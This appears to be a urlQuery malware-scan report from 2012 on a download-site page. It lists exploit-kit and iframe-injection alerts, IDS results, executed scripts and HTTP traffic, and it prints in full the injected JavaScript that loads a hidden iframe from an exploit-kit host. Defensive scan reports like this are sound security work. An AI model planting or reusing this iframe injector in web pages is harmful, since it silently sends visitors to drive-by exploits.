Overview

URLhttp://gratodo.com/edge-of-sanity-cryptic-1997mufsprogressive-death-metal
IP200.58.112.71
ASNAS27823 Dattatec.com
Location Argentina
Report completed2012-11-17 04:13:24 CET
StatusLoading report..
urlQuery Alerts Detected a Dynamic DNS URL
Detected Best exploit kit URL pattern
Detected malicious iframe injection


Settings

UserAgentMozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Referer
Adobe Reader8.0
Java1.6.0_26


Intrusion Detection Systems

Suricata /w Emerging Threats Pro No alerts detected
Snort /w Sourcefire VRT
Timestamp Source IP Destination IP Severity Alert
2012-11-17 04:12:51 urlQuery Client 173.194.69.1202ssp_ssl: Invalid Client HELLO after Server HELLO Detected
2012-11-17 04:12:51 urlQuery Client 173.194.69.1202ssp_ssl: Invalid Client HELLO after Server HELLO Detected


Recent reports on same IP/ASN/Domain

Last 6 reports on IP: 200.58.112.71

Date Alerts / IDS URL IP
2013-02-13 02:29:023 / 0http://gratodo.com/?p=194265200.58.112.71
2013-02-13 01:56:293 / 0http://gratodo.com/?p=194345200.58.112.71
2013-02-12 03:16:133 / 0http://gratodo.com/play-boy-en-parodvdripcomediaesp1984200.58.112.71
2013-02-12 02:40:103 / 0http://gratodo.com/call-of-duty-modern-warfare-3-ps3usm...200.58.112.71
2013-02-11 19:36:243 / 0http://gratodo.com/aleks-syntek-–-metodos-de-placer-in (...)200.58.112.71
2013-02-11 19:35:343 / 0http://gratodo.com/?p=194345200.58.112.71

Last 6 reports on ASN: AS27823 Dattatec.com

Date Alerts / IDS URL IP
2013-02-14 20:56:580 / 2http://www.acumuladoresroverano.com/errors/401/btnt.gif200.58.120.231
2013-02-14 20:10:540 / 0http://redamigo.mx200.58.120.3
2013-02-14 07:49:461 / 22http://www.alejandrobelgrano.com.ar/letter.htm200.58.121.82
2013-02-14 03:36:500 / 2http://www.acumuladoresroverano.com/errors/401/id1.gif???200.58.120.231
2013-02-14 03:31:350 / 2http://www.acumuladoresroverano.com/errors/401/id2.gif200.58.120.231
2013-02-14 03:31:290 / 1http://www.acumuladoresroverano.com/errors/401/sh.gif200.58.120.231

Last 6 reports on domain: gratodo.com

Date Alerts / IDS URL IP
2013-02-13 02:29:023 / 0http://gratodo.com/?p=194265200.58.112.71
2013-02-13 01:56:293 / 0http://gratodo.com/?p=194345200.58.112.71
2013-02-12 03:16:133 / 0http://gratodo.com/play-boy-en-parodvdripcomediaesp1984200.58.112.71
2013-02-12 02:40:103 / 0http://gratodo.com/call-of-duty-modern-warfare-3-ps3usm...200.58.112.71
2013-02-11 19:36:243 / 0http://gratodo.com/aleks-syntek-–-metodos-de-placer-instantaneo- (...)200.58.112.71
2013-02-11 19:35:343 / 0http://gratodo.com/?p=194345200.58.112.71



JavaScript

Executed Scripts (36)


Executed Evals (5)

#1 JavaScript::Eval (size: 647, repeated: 1) - Alert detect on script (Severity: 2)

		if (document.getElementsByTagName('body')[0]) {
		    iframer();
		} else {
		    document.write("<iframe src='http://mobiliti.ns01.us/my241011/fdc5db4892d34fcef91c75bd12d9a5ac/spl.php' width='10' height='10' style='visibility:hidden;position:absolute;left:0;top:0;'></iframe>");
		}
		function iframer() {
		    var f = document.createElement('iframe');
		    f.setAttribute('src', 'http://mobiliti.ns01.us/my241011/fdc5db4892d34fcef91c75bd12d9a5ac/spl.php');
		    f.style.visibility = 'hidden';
		    f.style.position = 'absolute';
		    f.style.left = '0';
		    f.style.top = '0';
		    f.setAttribute('width', '10');
		    f.setAttribute('height', '10');
		    document.getElementsByTagName('body')[0].appendChild(f);
		}

#2 JavaScript::Eval (size: 1584, repeated: 1)

(function() {
    var T = navigator.userAgent,
        P = function(a) {
            for (var b = 0, Z = a.length; b < Z; b++) {
                if (T.indexOf(a[b]) != -1) {
                    return true
                }
            }
            return false
        },
        C = P(["iPhone", "iPad", "Android", "Windows Phone OS", "Opera Mini", "UCWEB"]) ? "mobile" : "",
        O = "ice" + C + ".js",
        E = window["infolinks_white_label"];

    function J(Z) {
        return window[E + "_" + Z] || window["infolinks_" + Z] || window["infolink_" + Z] || null
    }
    var W = window["$iceboot"] = {};
    window["INFOLINKS"] = {
        _boot: W
    };
    var L = W.versions = {
        "312.0.5": 100
    };
    var A = W.siteVersions = {};
    var B = 0,
        K, F, M, N = location.hostname;
    K = location.search.match(/[\?&]il\.sv=([^&]+)/);
    if (K) {
        W.version = K[1]
    } else {
        for (F in L) {
            M = L[F];
            L[F] = {
                weight: M,
                from: B,
                to: B + M
            };
            B += M
        }
        W.rand = Math.ceil((Math.random() * B));
        for (F in L) {
            if (W.rand > L[F].from && W.rand <= L[F].to) {
                W.version = F;
                break
            }
        }
    }
    for (F in A) {
        for (S = 0, D = A[F].length; S < D; S++) {
            if (N.indexOf(A[F][S]) > -1) {
                W.version = F;
                break
            }
        }
    }
    var Y = ["/", W.version, "/", O].join("");
    var U = J("resources");
    K = location.search.match(/[\?&]il\.su=([^&]+)/);
    if (K) {
        W.url = K[1] + Y
    } else {
        if (U) {
            if (!/^http:\/\//.test(U)) {
                U = "http://" + U
            }
            W.url = U + Y
        } else {
            var Q = document.getElementsByTagName("script"),
                G, S, D;
            var R = /\/infolinks_main\.js$/;
            for (S = 0, D = Q.length; S < D; S++) {
                G = Q[S].src;
                if (G && G.match(R) != null) {
                    W.url = G.replace(R, Y);
                    break
                }
            }
        }
    }
    W.tmr_scr = new Date().getTime();
    if (W.url) {
        var V = J("ddw"),
            I = J("async");
        if (V || I) {
            var X = document.createElement("script");
            X.type = "text/javascript";
            X.charset = "UTF-8";
            X.src = W.url;
            if (I) {
                X.async = "async";
                X.defer = "defer"
            }
            var H = document.getElementsByTagName("head");
            if (H && H.length) {
                H[0].appendChild(X)
            }
        } else {
            document.write(['<script type="text/javascript" src="', W.url, '"><\/script>'].join(""))
        }
    }
})()

#3 JavaScript::Eval (size: 17, repeated: 1)

/*@cc_on!@*/
false

#4 JavaScript::Eval (size: 4, repeated: 647)

n[i]

#5 JavaScript::Eval (size: 18, repeated: 2)

self.location.href

Executed Writes (18)

#1 JavaScript::Write (size: 269, repeated: 2)

<IMG width=0 height=0 src="http://b.scorecardresearch.com/p?c1=8&c2=7936279&c3=0&cv=2.0&cj=1" style="margin:0;padding:0;display:none;"/><IMG width=0 height=0 src="http://pixel.quantserve.com/pixel/p-70x45KyHA6cIs.gif?media=ad" style="margin:0;padding:0;display:none;"/>

#2 JavaScript::Write (size: 118, repeated: 1)

<IMG width=0 height=0 src="http://pxses.smowtion.com/pixel.gif?id=1312813"  style="margin:0;padding:0;display:none;"/>

#3 JavaScript::Write (size: 1898, repeated: 1)

<OBJECT id="8505677865820771050" data="http://cdn.adnxs.com/p/5f/43/21/b2/5f4321b2ed91a60daf41402017adc5d7.swf" classid="clsid:D27CDB6E-AE6D-11cf-96B8-444553540000" WIDTH="120" HEIGHT="600" flashvars="clickTAG=http%3A%2F%2Fib.adnxs.com%2Fclick%3FP4hkyLE1_T822rtQCtT4PwAAAOBRuL4_Ntq7UArU-D9AiGTIsTX9P-pSJjb0PAp2oArzhH1cTlGzAKdQAAAAAMVYAwAdAgAANQEAAAIAAACKpxkAk8AAAAAAAQBVU0QAVVNEAHgAWAJn2wAAn08BAQUCAQUAAIIAfSVMNAAAAAA.%2Fcnd%3D%2521rgQeKAjWrwIQis9mGJOBAyAA%2Fclickenc%3Dhttp%253A%252F%252Fwww.kaseya.com%252Flps%252Fen%252Fppc%252Fit-departments.aspx%253Futm_campaign%253D70170000000Ta79"><PARAM NAME=movie VALUE="http://cdn.adnxs.com/p/5f/43/21/b2/5f4321b2ed91a60daf41402017adc5d7.swf"><PARAM NAME=loop VALUE=true><PARAM NAME=menu VALUE=false><PARAM NAME=quality VALUE=high><PARAM NAME=wmode VALUE="opaque"><PARAM NAME=bgcolor VALUE=#FFFFFF><PARAM NAME=allowscriptaccess VALUE=always><PARAM NAME=flashvars VALUE="clickTAG=http%3A%2F%2Fib.adnxs.com%2Fclick%3FP4hkyLE1_T822rtQCtT4PwAAAOBRuL4_Ntq7UArU-D9AiGTIsTX9P-pSJjb0PAp2oArzhH1cTlGzAKdQAAAAAMVYAwAdAgAANQEAAAIAAACKpxkAk8AAAAAAAQBVU0QAVVNEAHgAWAJn2wAAn08BAQUCAQUAAIIAfSVMNAAAAAA.%2Fcnd%3D%2521rgQeKAjWrwIQis9mGJOBAyAA%2Fclickenc%3Dhttp%253A%252F%252Fwww.kaseya.com%252Flps%252Fen%252Fppc%252Fit-departments.aspx%253Futm_campaign%253D70170000000Ta79"><OBJECT TYPE="application/x-shockwave-flash" data="http://cdn.adnxs.com/p/5f/43/21/b2/5f4321b2ed91a60daf41402017adc5d7.swf?clickTAG=http%3A%2F%2Fib.adnxs.com%2Fclick%3FP4hkyLE1_T822rtQCtT4PwAAAOBRuL4_Ntq7UArU-D9AiGTIsTX9P-pSJjb0PAp2oArzhH1cTlGzAKdQAAAAAMVYAwAdAgAANQEAAAIAAACKpxkAk8AAAAAAAQBVU0QAVVNEAHgAWAJn2wAAn08BAQUCAQUAAIIAfSVMNAAAAAA.%2Fcnd%3D%2521rgQeKAjWrwIQis9mGJOBAyAA%2Fclickenc%3Dhttp%253A%252F%252Fwww.kaseya.com%252Flps%252Fen%252Fppc%252Fit-departments.aspx%253Futm_campaign%253D70170000000Ta79" width="120" height="600" wmode="opaque" allowscriptaccess="always"></OBJECT></OBJECT>

#4 JavaScript::Write (size: 148, repeated: 1)

<SCRIPT TYPE="text/javascript" SRC="http://ad.yieldmanager.com/imp?Z=120x600&anmember=541&anprice=150&s=2565664&_salt=2719256163&B=10&r=0"></SCRIPT>

#5 JavaScript::Write (size: 147, repeated: 1)

<SCRIPT TYPE="text/javascript" SRC="http://ad.yieldmanager.com/imp?Z=468x60&anmember=541&anprice=140&s=2565664&_salt=1609769567&B=10&r=0"></SCRIPT>

#6 JavaScript::Write (size: 208, repeated: 1)

<SCRIPT TYPE="text/javascript" SRC="http://ts.smowtion.com/st?ad_type=ad&ad_size=300x250&section=1312813&position=btf&t_url=http://gratodo.com/edge-of-sanity-cryptic-1997mufsprogressive-death-metal"></SCRIPT>

#7 JavaScript::Write (size: 207, repeated: 1)

<SCRIPT TYPE="text/javascript" SRC="http://ts.smowtion.com/st?ad_type=ad&ad_size=728x90&section=1312813&position=btf&t_url=http://gratodo.com/edge-of-sanity-cryptic-1997mufsprogressive-death-metal"></SCRIPT>

#8 JavaScript::Write (size: 69, repeated: 1)

<div style="width:1px;height:1px;margin:0;padding:0" id="7017"></div>

#9 JavaScript::Write (size: 69, repeated: 1)

<div style="width:1px;height:1px;margin:0;padding:0" id="9065"></div>

#10 JavaScript::Write (size: 306, repeated: 1)

<iframe allowtransparency="true" scrolling="no" marginwidth="0" marginheight="0" frameborder="0" height="60" width="468" src="http://ib.adnxs.com/acb?member=541&width=468&height=60&pb=140&cb=1353121972&referrer=http://adserving.cpxinteractive.com/st?ad_type=iframe&ad_size=468x60&section=2565664"></iframe>

#11 JavaScript::Write (size: 309, repeated: 1)

<iframe allowtransparency="true" scrolling="no" marginwidth="0" marginheight="0" frameborder="0" height="600" width="120" src="http://ib.adnxs.com/acb?member=541&width=120&height=600&pb=150&cb=1353121973&referrer=http://adserving.cpxinteractive.com/st?ad_type=iframe&ad_size=120x600&section=2565664"></iframe>

#12 JavaScript::Write (size: 198, repeated: 1)

<iframe src="http://view.atdmt.com/iaction/adoapn_AppNexusDemoActionTag_1" width="1" height="1" frameborder="0" scrolling="No" marginheight="0" marginwidth="0" topmargin="0" leftmargin="0"></iframe>

#13 JavaScript::Write (size: 141, repeated: 1)

<img src="http://cm.g.doubleclick.net/pixel?google_nid=appnexus1&google_sc&google_hm=NTg1ODcyMTg1OTQyNjc4MTg1Ng%3D%3D" width="1" height="1"/>

#14 JavaScript::Write (size: 143, repeated: 1)

<script type="text/javascript" src="http://ad.yieldmanager.com/st?anmember=541&anprice=140&ad_type=ad&ad_size=468x60&section=2565664"></script>

#15 JavaScript::Write (size: 144, repeated: 1)

<script type="text/javascript" src="http://ad.yieldmanager.com/st?anmember=541&anprice=150&ad_type=ad&ad_size=120x600&section=2565664"></script>

#16 JavaScript::Write (size: 348, repeated: 1)

<script type="text/javascript" src="http://ib.adnxs.com/ptj?member=541&size=120x600&inv_code=2565664&referrer=http%3A%2F%2Fgratodo.com%2Fedge-of-sanity-cryptic-1997mufsprogressive-death-metal&redir=http%3A%2F%2Fad.yieldmanager.com%2Fst%3Fanmember%3D541%26anprice%3D%7BPRICEBUCKET%7D%26ad_type%3Dad%26ad_size%3D120x600%26section%3D2565664"></script>

#17 JavaScript::Write (size: 346, repeated: 1)

<script type="text/javascript" src="http://ib.adnxs.com/ptj?member=541&size=468x60&inv_code=2565664&referrer=http%3A%2F%2Fgratodo.com%2Fedge-of-sanity-cryptic-1997mufsprogressive-death-metal&redir=http%3A%2F%2Fad.yieldmanager.com%2Fst%3Fanmember%3D541%26anprice%3D%7BPRICEBUCKET%7D%26ad_type%3Dad%26ad_size%3D468x60%26section%3D2565664"></script>

#18 JavaScript::Write (size: 88, repeated: 1)

<script type="text/javascript" src="http://resources.infolinks.com/js//ice.js"></script>


HTTP Transactions (94)


Request Response
GET /wp-content/plugins/ic-besocial/besocial.css?ver=2.0 HTTP/1.1

Host: gratodo.com

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: text/css,*/*;q=0.1
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://gratodo.com/edge-of-sanity-cryptic-1997mufsprogressive-death-metal
HTTP/1.1 200 OK

Content-Type: text/css
Date: Sat, 17 Nov 2012 03:12:47 GMT
Server: Apache/2.2.22 (Unix) mod_ssl/2.2.22 OpenSSL/0.9.8e-fips-rhel5
Last-Modified: Fri, 21 Oct 2011 19:32:56 GMT
Etag: &quot;3b4578-8d5-4afd423d60a00&quot;
Accept-Ranges: bytes
Content-Length: 2261
Keep-Alive: timeout=20, max=200
Connection: Keep-Alive
GET /wp-includes/js/l10n.js?ver=20101110 HTTP/1.1

Host: gratodo.com

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://gratodo.com/edge-of-sanity-cryptic-1997mufsprogressive-death-metal
HTTP/1.1 200 OK

Content-Type: application/javascript
Date: Sat, 17 Nov 2012 03:12:47 GMT
Server: Apache/2.2.22 (Unix) mod_ssl/2.2.22 OpenSSL/0.9.8e-fips-rhel5
Last-Modified: Wed, 01 Jun 2011 06:55:31 GMT
Etag: &quot;3b4b84-134-4a4a101a31ec0&quot;
Accept-Ranges: bytes
Content-Length: 308
Keep-Alive: timeout=20, max=200
Connection: Keep-Alive
GET /wp-includes/js/comment-reply.js?ver=20090102 HTTP/1.1

Host: gratodo.com

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://gratodo.com/edge-of-sanity-cryptic-1997mufsprogressive-death-metal
HTTP/1.1 200 OK

Content-Type: application/javascript
Date: Sat, 17 Nov 2012 03:12:47 GMT
Server: Apache/2.2.22 (Unix) mod_ssl/2.2.22 OpenSSL/0.9.8e-fips-rhel5
Last-Modified: Wed, 01 Jun 2011 06:55:31 GMT
Etag: &quot;3b4b99-312-4a4a101a31ec0&quot;
Accept-Ranges: bytes
Content-Length: 786
Keep-Alive: timeout=20, max=200
Connection: Keep-Alive
GET /wp-content/themes/gratodo/admin/css/theme-style.css HTTP/1.1

Host: gratodo.com

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: text/css,*/*;q=0.1
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://gratodo.com/edge-of-sanity-cryptic-1997mufsprogressive-death-metal
HTTP/1.1 200 OK

Content-Type: text/css
Date: Sat, 17 Nov 2012 03:12:47 GMT
Server: Apache/2.2.22 (Unix) mod_ssl/2.2.22 OpenSSL/0.9.8e-fips-rhel5
Last-Modified: Thu, 29 Mar 2012 06:24:11 GMT
Etag: &quot;3b44e4-198-4bc5bc5a7d8c0&quot;
Accept-Ranges: bytes
Content-Length: 408
Keep-Alive: timeout=20, max=200
Connection: Keep-Alive
GET /edge-of-sanity-cryptic-1997mufsprogressive-death-metal HTTP/1.1

Host: gratodo.com

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
HTTP/1.1 200 OK

Content-Type: text/html; charset=UTF-8
Date: Sat, 17 Nov 2012 03:12:46 GMT
Server: Apache/2.2.22 (Unix) mod_ssl/2.2.22 OpenSSL/0.9.8e-fips-rhel5
X-Powered-By: PHP/5.2.17
Vary: Accept-Encoding,Cookie
Cache-Control: max-age=3, must-revalidate
WP-Super-Cache: Served supercache file from PHP
Keep-Alive: timeout=20, max=200
Connection: Keep-Alive
Transfer-Encoding: chunked
GET /wp-content/themes/gratodo/style.css HTTP/1.1

Host: gratodo.com

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: text/css,*/*;q=0.1
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://gratodo.com/edge-of-sanity-cryptic-1997mufsprogressive-death-metal
HTTP/1.1 200 OK

Content-Type: text/css
Date: Sat, 17 Nov 2012 03:12:47 GMT
Server: Apache/2.2.22 (Unix) mod_ssl/2.2.22 OpenSSL/0.9.8e-fips-rhel5
Last-Modified: Mon, 26 Mar 2012 12:08:32 GMT
Etag: &quot;3b44e1-492c-4bc243b9f9000&quot;
Accept-Ranges: bytes
Content-Length: 18732
Keep-Alive: timeout=20, max=200
Connection: Keep-Alive
GET /ad.js?s=1312813&z=300x250 HTTP/1.1

Host: ads.smowtion.com
GET /ad.js?s=1312813&amp;z=300x250 HTTP/1.1

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://gratodo.com/edge-of-sanity-cryptic-1997mufsprogressive-death-metal
HTTP/1.1 200 OK

Content-Type: text/javascript; charset=utf-8
Server: Apache
Last-Modified: Mon, 17 Sep 2012 20:01:22 GMT
Accept-Ranges: bytes
Content-Encoding: gzip
Content-Length: 1035
Cache-Control: max-age=604800
Date: Sat, 17 Nov 2012 03:12:48 GMT
Connection: keep-alive
Vary: Accept-Encoding
GET /ad.js?s=1312813&z=728x90 HTTP/1.1

Host: ads.smowtion.com
GET /ad.js?s=1312813&amp;z=728x90 HTTP/1.1

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://gratodo.com/edge-of-sanity-cryptic-1997mufsprogressive-death-metal
HTTP/1.1 200 OK

Content-Type: text/javascript; charset=utf-8
Server: Apache
Last-Modified: Mon, 17 Sep 2012 20:01:22 GMT
Accept-Ranges: bytes
Content-Encoding: gzip
Content-Length: 1035
Cache-Control: max-age=604800
Date: Sat, 17 Nov 2012 03:12:48 GMT
Connection: keep-alive
Vary: Accept-Encoding
GET /js/infolinks_main.js HTTP/1.1

Host: resources.infolinks.com

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://gratodo.com/edge-of-sanity-cryptic-1997mufsprogressive-death-metal
HTTP/1.1 200 OK

Content-Type: application/x-javascript
Content-Encoding: gzip
Cache-Control: max-age=3600
Date: Sat, 17 Nov 2012 03:12:48 GMT
Etag: &quot;c507ef-772-4ce5a36b431c0+gzip&quot;
Expires: Sat, 17 Nov 2012 04:12:48 GMT
Last-Modified: Tue, 13 Nov 2012 06:06:07 GMT
Server: ECS (arn/46E3)
Vary: Accept-Encoding
X-Cache: HIT
Content-Length: 1250
GET /images/misc/space.gif HTTP/1.1

Host: pordescargadirecta.com

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://gratodo.com/edge-of-sanity-cryptic-1997mufsprogressive-death-metal
HTTP/1.1 404 Not Found

Content-Type: text/html
Server: nginx/1.2.2
Date: Sat, 17 Nov 2012 03:13:11 GMT
Content-Length: 168
Connection: keep-alive
Keep-Alive: timeout=20
GET /js/plusone.js HTTP/1.1

Host: apis.google.com

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://gratodo.com/edge-of-sanity-cryptic-1997mufsprogressive-death-metal
Cookie: PREF=ID=18d07d2c5ecbbb08:U=205ee10a10512bfa:FF=0:TM=1350344350:LM=1350344627:S=oVTvNjgbzbFNBNUF; NID=64=UOjfkeau7k9dzmFvAsFwVqmD4s7g_bdUMaEnGOlKRSTKCit3R_G5xg2kMKTOgRf2IL0DzvimBbfFpj1mIHK6cKNk76wCsEyOlULvzyFq8aklSyHHGXGPdMpqcZCr8LfK
HTTP/1.1 200 OK

Content-Type: application/javascript; charset=utf-8
X-UA-Compatible: IE=edge, chrome=1
Etag: &quot;9f40ccce00af865ceb2b70072dc6cf44&quot;
Expires: Sat, 17 Nov 2012 03:12:48 GMT
Date: Sat, 17 Nov 2012 03:12:48 GMT
Cache-Control: private, max-age=1800
Content-Encoding: gzip
Transfer-Encoding: chunked
X-Content-Type-Options: nosniff
X-Frame-Options: SAMEORIGIN
X-XSS-Protection: 1; mode=block
Server: GSE
GET //js/anonymize.js HTTP/1.1

Host: megasharev.com

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://gratodo.com/edge-of-sanity-cryptic-1997mufsprogressive-death-metal
HTTP/1.1 302 Found

Content-Type: text/html; charset=iso-8859-1
Date: Sat, 17 Nov 2012 03:12:48 GMT
Server: Apache/2.2.17 (Unix) mod_ssl/2.2.17 OpenSSL/0.9.8e-fips-rhel5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635
Location: http://megasharev.com/cgi-sys/suspendedpage.cgi
Content-Length: 414
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
GET /swidget/p7a0iun6gxsy.png HTTP/1.1

Host: whos.amung.us

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://gratodo.com/edge-of-sanity-cryptic-1997mufsprogressive-death-metal
HTTP/1.1 303 See Other

Content-Type: text/html
Date: Sat, 17 Nov 2012 03:12:48 GMT
Transfer-Encoding: chunked
Connection: close
Location: http://widgets.amung.us/small/00/25.png
Set-Cookie: uid=CgH9HlCnALBT4lNwUKgEAg==; expires=Thu, 31-Dec-37 23:55:55 GMT; domain=whos.amung.us; path=/
GET /wp-content/themes/gratodo/images/rbotbg.gif HTTP/1.1

Host: gratodo.com

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://gratodo.com/edge-of-sanity-cryptic-1997mufsprogressive-death-metal
HTTP/1.1 200 OK

Content-Type: image/gif
Date: Sat, 17 Nov 2012 03:12:48 GMT
Server: Apache/2.2.22 (Unix) mod_ssl/2.2.22 OpenSSL/0.9.8e-fips-rhel5
Last-Modified: Fri, 21 Oct 2011 19:29:14 GMT
Etag: &quot;3b4517-245-4afd4169a9680&quot;
Accept-Ranges: bytes
Content-Length: 581
Keep-Alive: timeout=20, max=199
Connection: Keep-Alive
GET /avatar/3d5f81929686792dd45a245d172499fa?s=96&d=http%3A%2F%2F1.gravatar.com%2Favatar%2Fad516503a11cd5ca435acc9bb6523536%3Fs%3D96&r=G HTTP/1.1

Host: 1.gravatar.com
GET /avatar/3d5f81929686792dd45a245d172499fa?s=96&amp;d=http%3A%2F%2F1.gravatar.com%2Favatar%2Fad516503a11cd5ca435acc9bb6523536%3Fs%3D96&amp;r=G HTTP/1.1

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://gratodo.com/edge-of-sanity-cryptic-1997mufsprogressive-death-metal
HTTP/1.1 302 Found

Content-Type: text/html; charset=utf-8
Cache-Control: max-age=300
Date: Sat, 17 Nov 2012 03:12:48 GMT
Expires: Sat, 17 Nov 2012 03:17:48 GMT
Last-Modified: Wed, 11 Jan 1984 08:00:00 GMT
Location: http://1.gravatar.com/avatar/ad516503a11cd5ca435acc9bb6523536?s=96
Server: nginx
Source-Age: 0
Via: 1.1 varnish
X-Varnish: 4012474565
Content-Length: 0
GET /validate?sid=116678 HTTP/1.1

Host: px.smowtion.com

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://gratodo.com/edge-of-sanity-cryptic-1997mufsprogressive-death-metal
HTTP/1.1 200 OK

Content-Type: text/html
x-amz-id-2: QW0Gwig0GfCjyP2XWF+3QdeVIxhA0UUNsbBJ+UuBSLMbpmaPUdclMh/b/PEInW5s
x-amz-request-id: 72FC2DA1283E8380
Date: Sat, 17 Nov 2012 03:12:49 GMT
x-amz-meta-bucket: px.smowtion.com
x-amz-meta-bucketexplorer-md5: d41d8cd98f00b204e9800998ecf8427e
x-amz-meta-bucketexplorer-sha1: da39a3ee5e6b4b0d3255bfef95601890afd80709
x-amz-meta-etag: &quot;d41d8cd98f00b204e9800998ecf8427e&quot;
x-amz-meta-id: 664b36d8c4d7dfad7270d55c78591cd5a18db88ab0ea638587c154c9a17be7e6
x-amz-meta-key: validate
x-amz-meta-md5-hash: d41d8cd98f00b204e9800998ecf8427e
Last-Modified: Tue, 15 Feb 2011 20:26:42 GMT
Etag: &quot;d41d8cd98f00b204e9800998ecf8427e&quot;
Accept-Ranges: bytes
Content-Length: 0
Server: AmazonS3
GET /avatar/ad516503a11cd5ca435acc9bb6523536?s=96 HTTP/1.1

Host: 1.gravatar.com

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
